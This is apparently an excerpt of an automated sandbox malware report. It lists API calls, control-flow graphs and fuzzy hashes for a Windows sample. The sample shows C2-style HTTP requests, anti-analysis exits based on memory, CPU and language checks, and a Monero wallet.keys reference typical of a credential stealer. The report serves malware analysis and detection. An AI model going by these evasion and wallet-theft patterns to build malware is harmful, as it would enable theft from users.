                                    • GetProcAddress.KERNEL32(76910000,00B65648), ref: 000EA3E4
                                    • GetProcAddress.KERNEL32(76910000,00B7F448), ref: 000EA3FC
                                    • GetProcAddress.KERNEL32(76910000,00B7F538), ref: 000EA414
                                    • GetProcAddress.KERNEL32(75B30000,00B654A8), ref: 000EA436
                                    • GetProcAddress.KERNEL32(75B30000,00B7F460), ref: 000EA44E
                                    • GetProcAddress.KERNEL32(75B30000,00B7F298), ref: 000EA466
                                    • GetProcAddress.KERNEL32(75B30000,00B7F490), ref: 000EA47F
                                    • GetProcAddress.KERNEL32(75B30000,00B7F520), ref: 000EA497
                                    • GetProcAddress.KERNEL32(75670000,00B65688), ref: 000EA4B8
                                    • GetProcAddress.KERNEL32(75670000,00B655E8), ref: 000EA4D1
                                    • GetProcAddress.KERNEL32(76AC0000,00B65668), ref: 000EA4F2
                                    • GetProcAddress.KERNEL32(76AC0000,00B7F580), ref: 000EA50A
                                    • GetProcAddress.KERNEL32(6F4E0000,00B654C8), ref: 000EA530
                                    • GetProcAddress.KERNEL32(6F4E0000,00B65348), ref: 000EA548
                                    • GetProcAddress.KERNEL32(6F4E0000,00B65368), ref: 000EA560
                                    • GetProcAddress.KERNEL32(6F4E0000,00B7F2B0), ref: 000EA579
                                    • GetProcAddress.KERNEL32(6F4E0000,00B654E8), ref: 000EA591
                                    • GetProcAddress.KERNEL32(6F4E0000,00B656A8), ref: 000EA5A9
                                    • GetProcAddress.KERNEL32(6F4E0000,00B65388), ref: 000EA5C2
                                    • GetProcAddress.KERNEL32(6F4E0000,00B65508), ref: 000EA5DA
                                    • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 000EA5F1
                                    • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 000EA607
                                    • GetProcAddress.KERNEL32(75AE0000,00B7F2F8), ref: 000EA629
                                    • GetProcAddress.KERNEL32(75AE0000,00B792F8), ref: 000EA641
                                    • GetProcAddress.KERNEL32(75AE0000,00B7F310), ref: 000EA659
                                    • GetProcAddress.KERNEL32(75AE0000,00B7F670), ref: 000EA672
                                    • GetProcAddress.KERNEL32(76300000,00B65408), ref: 000EA693
                                    • GetProcAddress.KERNEL32(6FE40000,00B7F688), ref: 000EA6B4
                                    • GetProcAddress.KERNEL32(6FE40000,00B65528), ref: 000EA6CD
                                    • GetProcAddress.KERNEL32(6FE40000,00B7F6A0), ref: 000EA6E5
                                    • GetProcAddress.KERNEL32(6FE40000,00B7F5F8), ref: 000EA6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: f8f96410f07086f71cb42d1f95224cf67dc2e3373c23d7a615c177e550fa6306
                                    • Instruction ID: 09d3c27b488c7ba1f7b98406588b69ddec3b6846b76c9bc7303e825e655c3ccb
                                    • Opcode Fuzzy Hash: f8f96410f07086f71cb42d1f95224cf67dc2e3373c23d7a615c177e550fa6306
                                    • Instruction Fuzzy Hash: A7625CB5602A00AFC347DFA9ED889E63BFDF74C313F04C51AA609C32A5D6399552DB12
                                    Function 000D6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 d6280-d630b call ea7a0 call d47b0 call ea740 InternetOpenA StrCmpCA 1040 d630d 1033->1040 1041 d6314-d6318 1033->1041 1040->1041 1042 d631e-d6342 InternetConnectA 1041->1042 1043 d6509-d6525 call ea7a0 call ea800 * 2 1041->1043 1045 d64ff-d6503 InternetCloseHandle 1042->1045 1046 d6348-d634c 1042->1046 1062 d6528-d652d 1043->1062 1045->1043 1048 d634e-d6358 1046->1048 1049 d635a 1046->1049 1050 d6364-d6392 HttpOpenRequestA 1048->1050 1049->1050 1052 d6398-d639c 1050->1052 1053 d64f5-d64f9 InternetCloseHandle 1050->1053 1055 d639e-d63bf InternetSetOptionA 1052->1055 1056 d63c5-d6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 d642c-d644b call e8940 1056->1058 1059 d6407-d6427 call ea740 call ea800 * 2 1056->1059 1067 d644d-d6454 1058->1067 1068 d64c9-d64e9 call ea740 call ea800 * 2 1058->1068 1059->1062 1069 d64c7-d64ef InternetCloseHandle 1067->1069 1070 d6456-d6480 InternetReadFile 1067->1070 1068->1062 1069->1053 1073 d648b 1070->1073 1074 d6482-d6489 1070->1074 1073->1069 1074->1073 1078 d648d-d64c5 call ea9b0 call ea8a0 call ea800 1074->1078 1078->1070
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                      • Part of subcall function 000D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • InternetOpenA.WININET(000F0DFE,00000001,00000000,00000000,00000000), ref: 000D62E1
                                    • StrCmpCA.SHLWAPI(?,00B81328), ref: 000D6303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D6385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D63BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D63D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000D63FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000D646D
                                    • InternetCloseHandle.WININET(00000000), ref: 000D64EF
                                    • InternetCloseHandle.WININET(00000000), ref: 000D64F9
                                    • InternetCloseHandle.WININET(00000000), ref: 000D6503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 593e7de57780a1a931ac0e8084258bd2b0475c1cd07e04ad78fa220918fcb9c0
                                    • Instruction ID: 96b7cfd57189367de3ff9bc591f31bf67794310f876ca01a8fa2490539baf573
                                    • Opcode Fuzzy Hash: 593e7de57780a1a931ac0e8084258bd2b0475c1cd07e04ad78fa220918fcb9c0
                                    • Instruction Fuzzy Hash: 92717E71A00308AFDB24DFA0DC45BEE77B8BB48701F108199F10A6B2C5DBB56A85CF51
                                    Function 000E5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 e5510-e5577 call e5ad0 call ea820 * 3 call ea740 * 4 1106 e557c-e5583 1090->1106 1107 e55d7-e564c call ea740 * 2 call d1590 call e52c0 call ea8a0 call ea800 call eaad0 StrCmpCA 1106->1107 1108 e5585-e55b6 call ea820 call ea7a0 call d1590 call e51f0 1106->1108 1133 e5693-e56a9 call eaad0 StrCmpCA 1107->1133 1138 e564e-e568e call ea7a0 call d1590 call e51f0 call ea8a0 call ea800 1107->1138 1124 e55bb-e55d2 call ea8a0 call ea800 1108->1124 1124->1133 1140 e56af-e56b6 1133->1140 1141 e57dc-e5844 call ea8a0 call ea820 * 2 call d1670 call ea800 * 4 call e6560 call d1550 1133->1141 1138->1133 1144 e56bc-e56c3 1140->1144 1145 e57da-e585f call eaad0 StrCmpCA 1140->1145 1270 e5ac3-e5ac6 1141->1270 1149 e571e-e5793 call ea740 * 2 call d1590 call e52c0 call ea8a0 call ea800 call eaad0 StrCmpCA 1144->1149 1150 e56c5-e5719 call ea820 call ea7a0 call d1590 call e51f0 call ea8a0 call ea800 1144->1150 1164 e5865-e586c 1145->1164 1165 e5991-e59f9 call ea8a0 call ea820 * 2 call d1670 call ea800 * 4 call e6560 call d1550 1145->1165 1149->1145 1250 e5795-e57d5 call ea7a0 call d1590 call e51f0 call ea8a0 call ea800 1149->1250 1150->1145 1171 e598f-e5a14 call eaad0 StrCmpCA 1164->1171 1172 e5872-e5879 1164->1172 1165->1270 1201 e5a28-e5a91 call ea8a0 call ea820 * 2 call d1670 call ea800 * 4 call e6560 call d1550 1171->1201 1202 e5a16-e5a21 Sleep 1171->1202 1180 e587b-e58ce call ea820 call ea7a0 call d1590 call e51f0 call ea8a0 call ea800 1172->1180 1181 e58d3-e5948 call ea740 * 2 call d1590 call e52c0 call ea8a0 call ea800 call eaad0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 e594a-e598a call ea7a0 call d1590 call e51f0 call ea8a0 call ea800 1181->1275 1201->1270 1202->1106 1250->1145 1275->1171
                                    APIs
                                      • Part of subcall function 000EA820: lstrlen.KERNEL32(000D4F05,?,?,000D4F05,000F0DDE), ref: 000EA82B
                                      • Part of subcall function 000EA820: lstrcpy.KERNEL32(000F0DDE,00000000), ref: 000EA885
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E56A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5857
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000E51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5228
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5318
                                      • Part of subcall function 000E52C0: lstrlen.KERNEL32(00000000), ref: 000E532F
                                      • Part of subcall function 000E52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 000E5364
                                      • Part of subcall function 000E52C0: lstrlen.KERNEL32(00000000), ref: 000E5383
                                      • Part of subcall function 000E52C0: lstrlen.KERNEL32(00000000), ref: 000E53AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 000E5A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 6ec3ac3421a270cc7db847e2c215caee6f723df48a7930bf2c4ecd97b7047a13
                                    • Instruction ID: 2776fbe1a6e692727007fd5e9d9b9d40356a818bf1b1ab6bf8760286026bc806
                                    • Opcode Fuzzy Hash: 6ec3ac3421a270cc7db847e2c215caee6f723df48a7930bf2c4ecd97b7047a13
                                    • Instruction Fuzzy Hash: F3E19171A10544AEDB04FBA1DD92AFD733DAF59301F408528B50676193EF347A09CBA2
                                    Function 000E17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 e17a0-e17cd call eaad0 StrCmpCA 1304 e17cf-e17d1 ExitProcess 1301->1304 1305 e17d7-e17f1 call eaad0 1301->1305 1309 e17f4-e17f8 1305->1309 1310 e17fe-e1811 1309->1310 1311 e19c2-e19cd call ea800 1309->1311 1313 e199e-e19bd 1310->1313 1314 e1817-e181a 1310->1314 1313->1309 1316 e18cf-e18e0 StrCmpCA 1314->1316 1317 e198f-e1999 call ea820 1314->1317 1318 e18ad-e18be StrCmpCA 1314->1318 1319 e1849-e1858 call ea820 1314->1319 1320 e1821-e1830 call ea820 1314->1320 1321 e187f-e1890 StrCmpCA 1314->1321 1322 e185d-e186e StrCmpCA 1314->1322 1323 e1835-e1844 call ea820 1314->1323 1324 e1932-e1943 StrCmpCA 1314->1324 1325 e1913-e1924 StrCmpCA 1314->1325 1326 e1970-e1981 StrCmpCA 1314->1326 1327 e18f1-e1902 StrCmpCA 1314->1327 1328 e1951-e1962 StrCmpCA 1314->1328 1348 e18ec 1316->1348 1349 e18e2-e18e5 1316->1349 1317->1313 1346 e18ca 1318->1346 1347 e18c0-e18c3 1318->1347 1319->1313 1320->1313 1344 e189e-e18a1 1321->1344 1345 e1892-e189c 1321->1345 1342 e187a 1322->1342 1343 e1870-e1873 1322->1343 1323->1313 1331 e194f 1324->1331 1332 e1945-e1948 1324->1332 1329 e1926-e1929 1325->1329 1330 e1930 1325->1330 1336 e198d 1326->1336 1337 e1983-e1986 1326->1337 1350 e190e 1327->1350 1351 e1904-e1907 1327->1351 1333 e196e 1328->1333 1334 e1964-e1967 1328->1334 1329->1330 1330->1313 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 e18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 000E17C5
                                    • ExitProcess.KERNEL32 ref: 000E17D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 3ca825f0c68b519c73c3c305dacf8338ddc0febe8c2810afba478049ae5821c9
                                    • Instruction ID: bd370d988abb565da1664563e97efa630b5e446aada05f84343c3c93ad80a4a7
                                    • Opcode Fuzzy Hash: 3ca825f0c68b519c73c3c305dacf8338ddc0febe8c2810afba478049ae5821c9
                                    • Instruction Fuzzy Hash: 5D516BB4A04249EFDB14DFA2D954BFE77B9BF88704F108048E506BB252D770E941DB62
                                    Function 000E7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 e7500-e754a GetWindowsDirectoryA 1357 e754c 1356->1357 1358 e7553-e75c7 GetVolumeInformationA call e8d00 * 3 1356->1358 1357->1358 1365 e75d8-e75df 1358->1365 1366 e75fc-e7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 e75e1-e75fa call e8d00 1365->1367 1369 e7628-e7658 wsprintfA call ea740 1366->1369 1370 e7619-e7626 call ea740 1366->1370 1367->1365 1377 e767e-e768e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000E7542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E760A
                                    • wsprintfA.USER32 ref: 000E7640
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: bcf8b8ed3448a70007502419345c02ba1a40720f48ff9b232260a13c64953a56
                                    • Instruction ID: f14122c06a0b19444474fb96f9768229cbd03cf5f93a44445cb7e41ac9c494eb
                                    • Opcode Fuzzy Hash: bcf8b8ed3448a70007502419345c02ba1a40720f48ff9b232260a13c64953a56
                                    • Instruction Fuzzy Hash: EF41C1B1D04688AFDB11DF94CC45BEEBBB8EF08704F104099F50977281DB74AA44CBA1
                                    Function 000E69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68A60), ref: 000E98A1
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68970), ref: 000E98BA
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B689A0), ref: 000E98D2
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68A18), ref: 000E98EA
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B688F8), ref: 000E9903
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B79278), ref: 000E991B
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B65068), ref: 000E9933
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B651C8), ref: 000E994C
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68988), ref: 000E9964
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68B20), ref: 000E997C
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68850), ref: 000E9995
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B688E0), ref: 000E99AD
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B651A8), ref: 000E99C5
                                      • Part of subcall function 000E9860: GetProcAddress.KERNEL32(76210000,00B68868), ref: 000E99DE
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000D11D0: ExitProcess.KERNEL32 ref: 000D1211
                                      • Part of subcall function 000D1160: GetSystemInfo.KERNEL32(?), ref: 000D116A
                                      • Part of subcall function 000D1160: ExitProcess.KERNEL32 ref: 000D117E
                                      • Part of subcall function 000D1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000D112B
                                      • Part of subcall function 000D1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 000D1132
                                      • Part of subcall function 000D1110: ExitProcess.KERNEL32 ref: 000D1143
                                      • Part of subcall function 000D1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000D123E
                                      • Part of subcall function 000D1220: __aulldiv.LIBCMT ref: 000D1258
                                      • Part of subcall function 000D1220: __aulldiv.LIBCMT ref: 000D1266
                                      • Part of subcall function 000D1220: ExitProcess.KERNEL32 ref: 000D1294
                                      • Part of subcall function 000E6770: GetUserDefaultLangID.KERNEL32 ref: 000E6774
                                      • Part of subcall function 000D1190: ExitProcess.KERNEL32 ref: 000D11C6
                                      • Part of subcall function 000E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7880
                                      • Part of subcall function 000E7850: RtlAllocateHeap.NTDLL(00000000), ref: 000E7887
                                      • Part of subcall function 000E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E789F
                                      • Part of subcall function 000E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7910
                                      • Part of subcall function 000E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 000E7917
                                      • Part of subcall function 000E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000E792F
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00B791D8,?,000F110C,?,00000000,?,000F1110,?,00000000,000F0AEF), ref: 000E6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 000E6AF9
                                    • Sleep.KERNEL32(00001770), ref: 000E6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00B791D8,?,000F110C,?,00000000,?,000F1110,?,00000000,000F0AEF), ref: 000E6B1A
                                    • ExitProcess.KERNEL32 ref: 000E6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
